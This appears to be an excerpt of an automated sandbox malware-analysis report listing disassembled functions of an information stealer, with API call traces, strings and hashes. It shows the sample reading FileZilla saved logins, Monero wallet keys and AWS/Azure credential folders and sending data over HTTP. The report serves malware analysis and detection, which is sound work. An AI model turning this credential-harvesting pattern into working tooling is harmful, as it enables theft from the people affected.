                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00D40250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBA,00D50DB7,00D50DB6,00D50DB3), ref: 00D40362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D40369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D40385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D403CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D403DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D40463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D40562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00D40571
                              • lstrcat.KERNEL32(?,url: ), ref: 00D40580
                              • lstrcat.KERNEL32(?,00000000), ref: 00D40593
                              • lstrcat.KERNEL32(?,00D51678), ref: 00D405A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00D405B5
                              • lstrcat.KERNEL32(?,00D5167C), ref: 00D405C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00D405D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00D405E6
                              • lstrcat.KERNEL32(?,00D51688), ref: 00D405F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00D40604
                              • lstrcat.KERNEL32(?,00000000), ref: 00D40617
                              • lstrcat.KERNEL32(?,00D51698), ref: 00D40626
                              • lstrcat.KERNEL32(?,00D5169C), ref: 00D40635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 4d8551878cedbc921aca121f83c3149c6cf5c9e5864c1facdef27d2ce0d1f6f7
                              • Instruction ID: 90de011499efeb4785dbb9c7a301ca55a7f358504b8cc4b0b9a07e348f03281b
                              • Opcode Fuzzy Hash: 4d8551878cedbc921aca121f83c3149c6cf5c9e5864c1facdef27d2ce0d1f6f7
                              • Instruction Fuzzy Hash: 1FD14C76940208AFDB04EBF4DD96EEE7738EF58301F444518F506A6091EF34AA4ADB72
                              Function 00D35960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D359F8
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D35A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008DE550,00000000,?,008D99A8,00000000,?,00D51A1C), ref: 00D35E71
                              • lstrlen.KERNEL32(00000000), ref: 00D35E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D35E9A
                              • lstrlen.KERNEL32(00000000), ref: 00D35EAF
                              • lstrlen.KERNEL32(00000000), ref: 00D35ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FBD
                              • HttpOpenRequestA.WININET(00000000,008DE510,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D35BF8
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • InternetCloseHandle.WININET(00000000), ref: 00D35FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: bbd4b3a450890b0a79755838c8a4cabb0232749e78e79c1f735122ea8e5b9e6f
                              • Instruction ID: 5b3a383d371b1b47af93970b802fcde3e827010d314f2e259931f2567c68381f
                              • Opcode Fuzzy Hash: bbd4b3a450890b0a79755838c8a4cabb0232749e78e79c1f735122ea8e5b9e6f
                              • Instruction Fuzzy Hash: DE120271860128ABEB15EBA4DC96FDEB378FF54700F514199B50A62091DF702A4ACF72
                              Function 00D3CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D208
                              • lstrcat.KERNEL32(?,00D51478), ref: 00D3D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D22A
                              • lstrcat.KERNEL32(?,00D5147C), ref: 00D3D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D24C
                              • lstrcat.KERNEL32(?,00D51480), ref: 00D3D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D26E
                              • lstrcat.KERNEL32(?,00D51484), ref: 00D3D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D290
                              • lstrcat.KERNEL32(?,00D51488), ref: 00D3D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D2B2
                              • lstrcat.KERNEL32(?,00D5148C), ref: 00D3D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D2D4
                              • lstrcat.KERNEL32(?,00D51490), ref: 00D3D2E3
                                • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                                • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                              • lstrlen.KERNEL32(?), ref: 00D3D32A
                              • lstrlen.KERNEL32(?), ref: 00D3D339
                                • Part of subcall function 00D4AA70: StrCmpCA.SHLWAPI(008D8900,00D3A7A7,?,00D3A7A7,008D8900), ref: 00D4AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 0150e83cf64670c7191262f36fba30278e2ee371c690ccbe2e0edbfd4214123d
                              • Instruction ID: 6d022574330873c1464fffed56a552f47b97796d58f802b96974b7fd8869b3ea
                              • Opcode Fuzzy Hash: 0150e83cf64670c7191262f36fba30278e2ee371c690ccbe2e0edbfd4214123d
                              • Instruction Fuzzy Hash: B9E15B72850108ABEB04EBA4DD96EEE7378FF58301F114158F506B6091EE35AE4ADB73
                              Function 00D3C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008DCF88,00000000,?,00D5144C,00000000,?,?), ref: 00D3CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CAD9
                              • StrStrA.SHLWAPI(?,008DCEB0,00D50B52), ref: 00D3CAF7
                              • StrStrA.SHLWAPI(00000000,008DCF58), ref: 00D3CB1E
                              • StrStrA.SHLWAPI(?,008DD278,00000000,?,00D51458,00000000,?,00000000,00000000,?,008D88D0,00000000,?,00D51454,00000000,?), ref: 00D3CCA2
                              • StrStrA.SHLWAPI(00000000,008DD2F8), ref: 00D3CCB9
                                • Part of subcall function 00D3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                                • Part of subcall function 00D3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                              • StrStrA.SHLWAPI(?,008DD2F8,00000000,?,00D5145C,00000000,?,00000000,008D88F0), ref: 00D3CD5A
                              • StrStrA.SHLWAPI(00000000,008D8A10), ref: 00D3CD71
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                              • lstrlen.KERNEL32(00000000), ref: 00D3CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00D3CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: c24ad09d093702ff3199f1290ca7be3c4b6804ee7d8cd6e952e2a58791c03315
                              • Instruction ID: 59f2f8522cbf92d598bff26010d3d4857565083e01882c158cce55ec7895e204
                              • Opcode Fuzzy Hash: c24ad09d093702ff3199f1290ca7be3c4b6804ee7d8cd6e952e2a58791c03315
                              • Instruction Fuzzy Hash: 30E1FB71950108ABEB15EBA8DC92FEEB778EF54300F414159F50676191EF306A8ACF72
                              Function 00D48320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • RegOpenKeyExA.ADVAPI32(00000000,008DAD40,00000000,00020019,00000000,00D505B6), ref: 00D483A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                              • wsprintfA.USER32 ref: 00D48459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                              • Instruction ID: 624158d252c0dd665538311b2a6484ee3a063de433ea5c616cf7b73fe393cff7
                              • Opcode Fuzzy Hash: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                              • Instruction Fuzzy Hash: 5D81D97195011CABEB68DB54CC95FEEB7B8FF48700F008299E509A6180DF716A89DFB1
                              Function 00D44D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00D44DCD
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                                • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00D44E59
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                                • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                                • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D44EE5
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449B0
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D449C5
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449E2
                                • Part of subcall function 00D44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44A1E
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,008DE520), ref: 00D44A4A
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FF8), ref: 00D44A5C
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A70
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FFC), ref: 00D44A82
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A96
                                • Part of subcall function 00D44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44AAC
                                • Part of subcall function 00D44910: DeleteFileA.KERNEL32(?), ref: 00D44B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
